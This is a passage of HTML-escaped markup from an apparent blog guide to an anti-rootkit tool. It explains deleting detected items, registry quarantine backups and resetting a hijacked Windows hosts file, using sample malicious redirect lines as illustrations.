small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&amp;nbsp;&lt;/i&gt; &lt;/h3&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-esDEOH1a4oQ/UIpYUmL-P4I/AAAAAAAAAQw/PyphOBKwGA4/s1600/prescan.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-esDEOH1a4oQ/UIpYUmL-P4I/AAAAAAAAAQw/PyphOBKwGA4/s640/prescan.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Scan&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&amp;nbsp;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394; font-size: large;"&gt;&lt;i&gt;S&lt;span style="font-size: large;"&gt;UPPRESSION&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The de&lt;span style="font-size: small;"&gt;let&lt;span style="font-size: small;"&gt;ion is triggered by clicking on the &lt;b&gt;&lt;i&gt;Delete &lt;/i&gt;&lt;/b&gt;button.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;. &lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;Before, the &lt;span style="font-size: small;"&gt;user must &lt;b&gt;check the results of the previous scan&lt;/b&gt; into the di&lt;span style="font-size: small;"&gt;fferent t&lt;span style="font-size: small;"&gt;abs&lt;span style="font-size: small;"&gt;, or with the text report.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;span style="color: #990000;"&gt;The deleted/restored items will be only those in the &lt;i&gt;Registry &lt;/i&gt;or &lt;i&gt;Files &lt;/i&gt;tabs&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;.&lt;/span&gt;&lt;/b&gt; If you're in doubt, please see following sections on the deep anal&lt;span style="font-size: small;"&gt;ysis&lt;/span&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;If some items looks legit, you have the &lt;b&gt;possibility to uncheck them (&lt;i&gt;R&lt;span style="font-size: small;"&gt;e&lt;/span&gt;gistry &lt;/i&gt;tab only) before the deletion &lt;/b&gt;(and notify them to &lt;span style="font-size: small;"&gt;the developer &lt;/span&gt;by email, please)&lt;span style="font-size: small;"&gt;. Unlike the scan, &lt;span style="font-size: small;"&gt;the deletion modif&lt;span style="font-size: small;"&gt;ies the system&lt;span style="font-size: small;"&gt;, be&lt;span style="font-size: small;"&gt;cause this is the way malwares must be deleted. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Howeve&lt;span style="font-size: small;"&gt;r, &lt;b&gt;every modified registry key is &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;first saved in the RK_Quarantine folder&lt;/b&gt; (see below)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the delet&lt;span style="font-size: small;"&gt;i&lt;/span&gt;on finished, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; The program may ask to reboot&lt;span style="font-size: small;"&gt; the PC. If this happen&lt;span style="font-size: small;"&gt;s, you should accept b&lt;span style="font-size: small;"&gt;e&lt;span style="font-size: small;"&gt;cause some malwares can only be &lt;span style="font-size: small;"&gt;removed after a reboot&lt;span style="font-size: small;"&gt; and could be reactivated otherwise&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MzQvUWdTE_8/UIpYRY2d6aI/AAAAAAAAAQY/hLtkzLLL3E8/s1600/delete.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://4.bp.blogspot.com/-MzQvUWdTE_8/UIpYRY2d6aI/AAAAAAAAAQY/hLtkzLLL3E8/s640/delete.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Delete&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;HOST RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The &lt;a href="http://en.wikipedia.org/wiki/Hosts_%28file%29"&gt;Hosts file&lt;/a&gt; is a &lt;span style="font-size: small;"&gt;Windows conf&lt;span style="font-size: small;"&gt;iguration file, al&lt;span style="font-size: small;"&gt;lowing to make redirections of domain names to&lt;span style="font-size: small;"&gt; some IPs. We &lt;span style="font-size: small;"&gt;usually use it to forbid the access to &lt;span style="font-size: small;"&gt;a&lt;/span&gt; website, or to bind &lt;span style="font-size: small;"&gt;local &lt;span style="font-size: small;"&gt;addresses &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;(ex: &lt;b&gt;192.168.1.&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;12&lt;/b&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; to&lt;span style="font-size: small;"&gt; &lt;span style="font-size: small;"&gt;a textual address (&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;ex: &lt;b&gt;http://test.com&lt;/b&gt;)&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;. Here's some legit redirections example&lt;span style="font-size: small;"&gt;s&lt;/span&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;127.0.0.1 localhost &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(by default in the windows hosts file)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;127.0.0.1 &lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;www.&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;malware_website.com&lt;/i&gt;&lt;/span&gt;&lt;/b&gt; (forbid the access to a &lt;span style="font-size: small;"&gt;dangerous website)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;192.168.1.12 &lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;my_local_website&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt; (bind a textual address to a&lt;span style="font-size: small;"&gt; local IP)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Malwares can use it &lt;span style="font-size: small;"&gt;to &lt;b&gt;redirect legit web addresses to malware servers&lt;/b&gt;&lt;span style="font-size: small;"&gt;, and by the way infect new users. Here's an example of malware usage:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="color: #cc0000;"&gt;123.456.789.10 &lt;span style="font-size: small;"&gt;www.google.com&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(&lt;span style="font-size: small;"&gt;redirect a well known website to an unk&lt;span style="font-size: small;"&gt;nown IP - the malware se&lt;span style="font-size: small;"&gt;rver&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;)&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="color: #cc0000;"&gt;165.498.156.14 &lt;span style="font-size: small;"&gt;www.facebook.com&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;redirect a well known website to an unk&lt;span style="font-size: small;"&gt;nown IP - the malware se&lt;span style="font-size: small;"&gt;rver&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;These lines must be removed&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;.&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The hosts file content &lt;span style="font-size: small;"&gt;is displayed after a &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;in the &lt;i&gt;&lt;b&gt;Hosts &lt;/b&gt;&lt;/i&gt;tab, or &lt;span style="font-size: small;"&gt;in the section with the same name in the report. The &lt;i&gt;&lt;b&gt;Hosts Fix &lt;/b&gt;&lt;/i&gt;button can be used to &lt;b&gt;reset the file'&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;s content&lt;/b&gt; with the only &lt;span style="font-size: small;"&gt;existing line by default&lt;span style="font-size: small;"&gt;: &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;127.0.0.1 localhost&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the reset finished, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span 